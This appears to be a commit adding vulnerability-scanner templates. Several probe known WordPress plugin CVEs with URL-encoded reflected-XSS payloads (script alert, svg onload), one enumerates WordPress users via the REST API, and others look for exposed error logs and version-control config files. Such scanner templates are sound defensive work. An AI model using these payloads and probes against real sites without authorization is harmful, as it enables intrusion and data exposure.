Adding some templates

CVE-2012-4242.yaml

@@ -0,0 +1,29 @@
+id: CVE-2012-4242
+
+info:
+  name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
+  tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2013-2287.yaml

@@ -0,0 +1,29 @@
+id: CVE-2013-2287
+
+info:
+  name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
+  tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123);</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2013-3526.yaml

@@ -0,0 +1,29 @@
+id: CVE-2013-3526
+
+info:
+  name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
+  tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(1)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2014-9094.yaml

@@ -0,0 +1,29 @@
+id: CVE-2014-9094
+
+info:
+  name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+  tags: cve,2014,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(1)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2017-5487.yaml

@@ -0,0 +1,35 @@
+id: CVE-2017-5487
+
+info:
+  name: WordPress Core < 4.7.1 - Username Enumeration
+  author: Manas_Harsh,daffainfo,geeknik
+  severity: info
+  description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
+  tags: cve,cve2017,wordpress
+  reference: |
+      - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
+      - https://www.exploit-db.com/exploits/41497
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/wp/v2/users/"
+      - "{{BaseURL}}/?rest_route=/wp/v2/users/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - '"id":'
+          - '"name":'
+          - '"avatar_urls":'
+        condition: and

CVE-2019-14470.yaml

@@ -0,0 +1,31 @@
+id: CVE-2019-14470
+
+info:
+  name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: |
+    - https://wpscan.com/vulnerability/9815
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
+  tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<svg/onload=alert(1)>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2019-15889.yaml

@@ -0,0 +1,29 @@
+id: CVE-2019-15889
+
+info:
+  name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
+  tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(1)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2020-29395.yaml

@@ -0,0 +1,31 @@
+id: CVE-2020-29395
+
+info:
+  name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: |
+    - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-29395
+  tags: cve,cve2020,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<svg/onload=alert(1)>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

error-logs.yaml

@@ -0,0 +1,57 @@
+id: error-logs
+info:
+  name: common error log files
+  author: geeknik,daffainfo
+  severity: low
+  tags: logs,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/routes/error_log"
+      - "{{BaseURL}}/config/error_log"
+      - "{{BaseURL}}/error_log"
+      - "{{BaseURL}}/errors_log"
+      - "{{BaseURL}}/logs/error.log"
+      - "{{BaseURL}}/logs/errors.log"
+      - "{{BaseURL}}/log/error.log"
+      - "{{BaseURL}}/log/errors.log"
+      - "{{BaseURL}}/errors/errors.log"
+      - "{{BaseURL}}/error/error.log"
+      - "{{BaseURL}}/errors.log"
+      - "{{BaseURL}}/error.log"
+      - "{{BaseURL}}/error.txt"
+      - "{{BaseURL}}/errors.txt"
+      - "{{BaseURL}}/admin/logs/error.log"
+      - "{{BaseURL}}/admin/logs/errors.log"
+      - "{{BaseURL}}/admin/log/error.log"
+      - "{{BaseURL}}/admin/error.log"
+      - "{{BaseURL}}/admin/errors.log"
+      - "{{BaseURL}}/{{Hostname}}/error.log"
+      - "{{BaseURL}}/{{Hostname}}/errors.log"
+      - "{{BaseURL}}/MyErrors.log"
+      - "{{BaseURL}}/log.txt"
+      - "{{BaseURL}}/logs.txt"
+      - "{{BaseURL}}/log.log"
+      - "{{BaseURL}}/application/logs/application.log"
+      - "{{BaseURL}}/application/logs/default.log"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Segmentation Fault"
+          - "coredump"
+          - "script headers"
+          - "Broken pipe"
+          - "Array"
+        condition: or
+
+      - type: word
+        words:
+          - text/plain
+        part: header
+
+      - type: status
+        status:
+          - 200

exposed-bitkeeper.yaml

@@ -0,0 +1,27 @@
+id: exposed-bitkeeper
+
+info:
+  name: Exposed BitKeeper Directory
+  author: daffainfo
+  severity: low
+  reference: https://www.bitkeeper.org/man/config-etc.html
+  tags: config,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/BitKeeper/etc/config"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "BitKeeper configuration"
+          - "logging"
+          - "email"
+          - "description"
+        condition: and
+
+      - type: status
+        status:
+          - 200

exposed-bzr.yaml

@@ -0,0 +1,30 @@
+id: exposed-bzr
+
+info:
+  name: Exposed BZR Directory
+  author: daffainfo
+  severity: low
+  reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html
+  tags: config,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.bzr/branch/branch.conf"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "parent_location"
+          - "push_location"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"

exposed-darcs.yaml

@@ -0,0 +1,23 @@
+id: exposed-darcs
+
+info:
+  name: Exposed Darcs Config
+  author: daffainfo
+  severity: low
+  reference: http://darcs.net/Using/Configuration#sources
+  tags: config,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/_darcs/prefs/binaries"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Binary file regexps"
+
+      - type: status
+        status:
+          - 200